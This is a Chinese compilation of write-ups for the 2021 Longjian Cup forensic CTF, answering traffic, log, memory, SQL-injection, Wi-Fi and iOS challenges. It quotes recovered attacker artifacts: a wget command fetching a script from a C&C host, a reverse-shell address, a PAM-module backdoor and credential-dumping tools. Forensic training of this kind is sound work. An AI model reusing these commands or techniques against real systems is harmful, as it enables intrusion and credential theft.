陇剑杯 2021 write up整理

竞赛 write up 收集和整理

  • 陇剑杯 2021 write up整理
    • 1 签到题
      • 1.1
    • 2 JWT
      • 2.1
      • 2.2
      • 2.3
      • 2.4
      • 2.5
      • 2.6
    • 3 webshell
      • 3.1
      • 3.2
      • 3.3
      • 3.4
      • 3.5
      • 3.6
      • 3.7
    • 4 日志分析
      • 4.1
      • 4.2
      • 4.3
    • 5 流量分析
      • 5.1
      • 5.2
      • 5.3
    • 6 内存分析
      • 6.1
      • 6.2
    • 7 简单日志分析
      • 7.1
      • 7.2
      • 7.3
    • 8 SQL注入
      • 8.1
      • 8.2
      • 8.3
    • 9 wifi
      • 9.1
    • 10 IOS
      • 10.1
      • 10.2
      • 10.3
      • 10.4
      • 10.5
      • 10.6 暂未发现write up
      • 10.7
      • 10.8
    • 11 加密的大文件
      • 11.1

陇剑杯 2021 write up整理

1 签到题

1.1

【题目描述】
此时正在进行的可能是_http_协议的网络攻击。(如有字母请全部使用小写,填写样例:http,dns,ftp)

【操作内容】
如下图可知,正在进行的可能为 http 协议攻击。
陇剑杯 2021 write up整理_第1张图片

2 JWT

2.1

【题目描述】
该网站使用了_jwt_认证方式。(如有字母请全部使用小写)

【操作内容】
简单的流量审计,查看登录后的 cookie 可知使用了 jwt 的认证方式。
陇剑杯 2021 write up整理_第2张图片

2.2

【题目描述】
黑客绕过验证使用的jwt中,id和username是_10087#admin _。

【操作内容】

方法1:简单的流量审计,查看绕过用的 jwt cookie可得id和username为10087#admin。
陇剑杯 2021 write up整理_第3张图片
方法2:搜索username得到
陇剑杯 2021 write up整理_第4张图片

2.3

【题目描述】
黑客获取webshell之后,权限是_== root==_?

【操作内容】
查看命令执行的结果可得:
陇剑杯 2021 write up整理_第5张图片
陇剑杯 2021 write up整理_第6张图片

2.4

【题目描述】
黑客上传的恶意文件文件名是_/tem/1.c_。

【操作内容】
查看命令执行内容可得:
陇剑杯 2021 write up整理_第7张图片

2.5

【题目描述】
黑客在服务器上编译的恶意so文件,文件名是_looter.so_。

【操作内容】
查看命令执行内容可得:
陇剑杯 2021 write up整理_第8张图片

2.6

【题目描述】
黑客在服务器上修改了一个配置文件,文件的绝对路径为_/etc/pam.d/common-auth_。

【操作内容】
发现文件“looter.so”文件被导向/etc/pam.d/common-auth路径,猜测这里就是被修改的配置文件。
陇剑杯 2021 write up整理_第9张图片

3 webshell

3.1

【题目描述】
黑客登录系统使用的密码是_Admin123!@#_。

【操作内容】
在流量包中搜索pass、password或者admin,即可查询到密码为“Admin123!@#”。
陇剑杯 2021 write up整理_第10张图片

3.2

【题目描述】
黑客修改了一个日志文件,文件的绝对路径为_/var/www/html/data/Runtime/Logs/Home/21_08_07.log_。

【操作内容】
对日志进行分析,查看哪个数据包的流跟踪中带有log文件,如下图所示:
陇剑杯 2021 write up整理_第11张图片

3.3

【题目描述】
黑客获取webshell之后,权限是_ www-data_?

【操作内容】
陇剑杯 2021 write up整理_第12张图片

3.4

【题目描述】
黑客写入的webshell文件名是_1.php_。

【操作内容】
字符串过滤,对post数据包进行查找和分析,发现第337个数据包post上去了webshell文件,写入的webshell文件名为1.php。
陇剑杯 2021 write up整理_第13张图片

3.5

【题目描述】
黑客上传的代理工具客户端名字是_frpc_。

【操作内容】
查看上传的配置文件可得客户端名字为frpc。

方法1:
陇剑杯 2021 write up整理_第14张图片
方法2:
陇剑杯 2021 write up整理_第15张图片

3.6

【题目描述】
黑客代理工具的回连服务端IP是_192.168.239.123_。

【操作内容】
在这里插入图片描述
获得一串十六进制代码,直接010Editor打开
陇剑杯 2021 write up整理_第16张图片

3.7

【题目描述】
黑客的socks5的连接账号、密码是_0HDFt16cLQJ#JTN276Gp_。

【操作内容】
查看上传的配置文件可得账号和密码,如下图所示:
陇剑杯 2021 write up整理_第17张图片

4 日志分析

4.1

【题目描述】
网络存在源码泄漏,源码文件名是__www.zip__。

【操作内容】
(1) 使用sublime_text编辑器打开access.log文件,删除404所在行的所有信息(ctrl+f,find all,ctrl+L,delete),得到如下信息:
陇剑杯 2021 write up整理_第18张图片
(2) 使用burpsuit将上图中带有url编码的路径进行url decode,结果如下:
陇剑杯 2021 write up整理_第19张图片
(3) 以上内容可知源码的文件名为www.zip。
陇剑杯 2021 write up整理_第20张图片

4.2

【题目描述】
分析攻击流量,黑客往/tmp目录写入一个文件,文件名为__sess_car__。

【操作内容】
继续分析上一步骤burpsuit解码后的文件,可发现黑客写入的文件为sess_car。
陇剑杯 2021 write up整理_第21张图片

4.3

【题目描述】
继续分析4.1中burpsuit解码后的文件,可以发现黑客使用了SplFileObject类读取了秘密文件flag。

【操作内容】
陇剑杯 2021 write up整理_第22张图片

5 流量分析

5.1

【题目描述】
攻击者的IP是____ == 172.18.0.125 ==_________。

【操作内容】
分析pcap流量包,主机ip应该是172.18.0.1,可以看到很多UDP协议的包。在看包内容的时候,注意到UDP包头都是P05=,而且有的是有base64,也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00,其中00的长度是32、01的长度是16,可能是认证。

根据长度为16猜测可能是aes,用长度16的base64(即P05=后面是01 00 00 00的)作为aes key解密发现解密成功了,02 00 00 00对应的包里面都有一个可见字符,其中受害IP172.18.0.125有命令:wget http://147.182.251.98/d.sh。

5.2

【题目描述】
攻击者所使用的会话密钥是______ ==DtX0GScM9dwrgZht ==_______。

【操作内容】

5.3

【题目描述】
攻击者所控制的C&C服务器IP是____ == 147.182.251.98 ==_________。

【操作内容】
第三问ip即为147.182.251.98(udp.stream eq 85)

6 内存分析

6.1

【题目描述】
虚拟机的密码是____ flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}_________。(密码中为flag{xxxx},含有空格,提交时不要去掉)

【操作内容】
这里可以使用工具自带的lsadump也可以安装mimikatz插件获取
在这里插入图片描述

6.2

虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为______ flag{TH4NK Y0U FOR DECRYPTING MY DATA}_______。(解题过程中需要用到上一题答案中flag{}内的内容进行处理。本题的格式也是flag{xxx},含有空格,提交时不要去掉)

【操作内容】
陇剑杯 2021 write up整理_第23张图片
这里使用filescan扫描CTF用户的文件,发现了华为P40的备份文件
陇剑杯 2021 write up整理_第24张图片

于是把华为备份文件dump出来,同时可以直接在dat文件里把备份文件夹解压出来,再利用工具 kobackupdec
在这里插入图片描述
即可获取flag
在这里插入图片描述

7 简单日志分析

7.1

【题目描述】
黑客攻击的参数是_user_(如有字母请全部使用小写)

【操作内容】
1、将日志文件中反馈为404的条目去掉,剩下3条数据包,数据包如下:
在这里插入图片描述

2、对数据包进行分析,即可获得黑客攻击的参数为user,如下图所示:
在这里插入图片描述

7.2

【题目描述】
黑客查看的秘密文件的绝对路径是_/Th4s_IS_VERY_Import_Fi1e_。

【操作内容】
1、将日志文件中反馈为404的条目去掉,剩下3条数据包,数据包如下:
在这里插入图片描述

2、提取get对应的参数,结果如下:
在这里插入图片描述

3、将获取到的参数放入burpsuit进行base64解码,结果如下:
陇剑杯 2021 write up整理_第25张图片

陇剑杯 2021 write up整理_第26张图片

因此秘密文件的绝对路径是:/Th4s_IS_VERY_Import_Fi1e

7.3

【题目描述】
黑客反弹shell的hip和端口是__192.168.2.197:8888__(格式使用"ip:端口",例如127.0.0.1:2333)

【操作内容】
分析7.2获取到的信息,即可发现反弹shell的ip和端口是:192.168.2.197:8888。
陇剑杯 2021 write up整理_第27张图片

8 SQL注入

8.1

【题目描述】
黑客在注入过程中采用的注入手法叫__布尔盲注__。(格式为4个汉字,例如"拼博努力")

【操作内容】
根据注入特征得知为布尔盲注。
陇剑杯 2021 write up整理_第28张图片

8.2

【题目描述】
黑客在注入过程中,最终获取flag的数据库名、表名和字段名是__sqli#flag#flag__。(格式为“数据库名#表名#字段名",例如database#tableffcolumn)

【操作内容】
根据日志分析,获取到flag的“数据库名#表名#字段名”分别为“sqli#flag#flag”。
陇剑杯 2021 write up整理_第29张图片

8.3

【题目描述】
黑客最后获取到的flag字符串为__flag{deddcd67-bcfd-487e-b940-1217e668c7db}__。

【操作内容】

方法1:

1、根据布尔盲注的原理,将access.log文件中多余的数据包去除,只剩下界面为真的数据条目,如下图所示:

2、将获取到的条目放入burpsuit进行url解码,结果如下:
陇剑杯 2021 write up整理_第30张图片

3、如此,成功获取到flag的值flag{deddcd67-bcfd-487e-b940-1217e668c7db}。

方法2:正则匹配

# coding : utf-8
import re
from urllib.parse import unquote

file_name = "access_1.log"
pattern_string = "select%20flag%20from%20sqli.flag"
#file_name = input("输入文件名,文件记得要在当前脚本目录下:")
#pattern_string = input("复制个特征值过来,比如select,flag啥的:")
flag = ''

# 打开文件以及读取行数
get_File = open(file_name, "r+")
get_line = get_File.readline()

while get_line:
    get_Data = re.search(pattern_string, get_line)
    if get_Data:
        get_Data_Num = re.search(r'4[7-8][0-1]?.*', get_Data.string)
        if get_Data_Num:
            flag += (re.findall(r"%20=%20\'(.+?)\'", get_Data_Num.string))[0]
            print(unquote(flag[:-1], 'utf-8'))
    get_line = get_File.readline()
get_File.close()

9 wifi

9.1

【题目描述】
小王往upload-labs上传木马后进行了cat /flag,flag内容为_____ flag{5db5b7b0bb74babb66e1522f3a6b1b12}________。(压缩包里有解压密码的提示,需要额外添加花括号)

【操作内容】
分析 服务端.pcapng获取1.php

陇剑杯 2021 write up整理_第31张图片
打开 客户端.cap发现是加密的Wi-Fi包
陇剑杯 2021 write up整理_第32张图片

对内存进行分析(看桌面,看admin,意外发现Mywifi.zip)
陇剑杯 2021 write up整理_第33张图片
这里就需要一个前置知识了

网卡的 GUID 和接口绑定是绑定的,win7的wifi密码就存放在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]

如果不知道这里,其实也可以使用命令:

getmac /V /S 127.0.0.1 

然后再everything搜索一下,因此这里直接搜索Interface。
在这里插入图片描述
解压之后回去xml,里面存在wifi的信息
陇剑杯 2021 write up整理_第34张图片
因此可以解密wifi流量
陇剑杯 2021 write up整理_第35张图片

这里也可以使用如下命令

在这里插入图片描述
解密后可以获取加密返回的信息,到这里基础信息收集完毕了,剩下的就是解密流量了,参考文章:

https://www.freebuf.com/sectool/285693.html
https://blog.csdn.net/zeros__/article/details/111521314

陇剑杯 2021 write up整理_第36张图片

根据上面的文章可以知道(对于PHP_XOR_BASE64加密方式来说,前后各附加了16位的混淆字符),所以我们拿到的流量要先删除前16位和后16位字符,同时Godzilla的流量还会进行一个gzip压缩,因此最外层还要用gzdecode进行一次解码。
最终解密1198号数据包的时候获取flag

陇剑杯 2021 write up整理_第37张图片

陇剑杯 2021 write up整理_第38张图片

在5.x的环境中运行获取flag flag{5db5b7b0bb74babb66e1522f3a6b1b12}

最后提供一个非常大神的解决方案,自己用同样的木马连接一下,然后改返回包就行了
陇剑杯 2021 write up整理_第39张图片

10 IOS

10.1

【题目描述】
黑客所控制的C&C服务器IP是__3.128.156.159__。

【操作内容】
跟进流量中的TCP报文,发现在第15个TCP流中发现明文流量,首先从GitHub中下载了ios_agent后门程序,如下图所示:
陇剑杯 2021 write up整理_第40张图片
然后与攻击服务器建立连接,如下所示:
陇剑杯 2021 write up整理_第41张图片

得知C&C服务器为3.128.156.159。

10.2

【题目描述】
黑客利用的Github开源项目的名字是__stowaway__。(如有字母请全部使用小写)

【操作内容】
基于github字符串类型过滤流量包内容,匹配到以下数据包:
陇剑杯 2021 write up整理_第42张图片

陇剑杯 2021 write up整理_第43张图片

因此下载到的开源项目名称为:stowaway。

10.3

【题目描述】
通讯加密密钥的明文是__hack4sec__。

【操作内容】
根据TCP流量,得知该ios_agent的加密密钥明文hack4sec,如下图所示:
陇剑杯 2021 write up整理_第44张图片

10.4

【题目描述】
盲注拿到了一个敏感数据__746558f3-c841-456b-85d7-d6c0f2edabb2__。

【操作内容】
这里需要先对TLS数据流进行解密。首选项,TLS 选择keylog.txt
陇剑杯 2021 write up整理_第45张图片

数据流过滤为http2,然后对数据流进行盲注分析(这里我进行了导出并进行了urldecode)
陇剑杯 2021 write up整理_第46张图片

这个题跟上面的日志分析一样,最后hex转一下就可以了

746558f3-c841-456b-85d7-d6c0f2edabb2

10.5

【题目描述】
黑客端囗扫描的扫描器的扫描范围是__10-499__。(格式使用“开始端口-结束端口”)

【操作内容】
1、基于跳板服务器进行分析,可以发现其一直进行端口扫描的目标ip为192.168.1.12,wireshark过滤后结果如下图:
陇剑杯 2021 write up整理_第47张图片陇剑杯 2021 write up整理_第48张图片
2、因此扫描器的扫描范围为:10-499。

10.6 暂未发现write up

【题目描述】
被害者手机上被拿走了的私钥文件内容是___________。

【操作内容】

10.7

【题目描述】
黑客访问/攻击了内网的几个服务器,IP地址为__172.28.0.2#192.168.1.12__。

【操作内容】
方法1:access.log很明显的,172.28.0.2为已被攻击。结合上题被疯狂扫描,认为是192.168.1.12。

方法2:跳板机地址为192.168.1.8,通过科来分析源ip为192.168.1.8,目标地址为本地ip的tcp流量,发现两个IP:172.28.0.2#192.168.1.12。

10.8

【题目描述】
黑客写入了一个webshell,其密码为__fxxk__。

【操作内容】
分析提供的access.log即可获得到写入的webshell密码fxxk。
陇剑杯 2021 write up整理_第49张图片

11 加密的大文件

11.1

【题目描述】

【操作内容】

你可能感兴趣的:(Web,安全,python,http)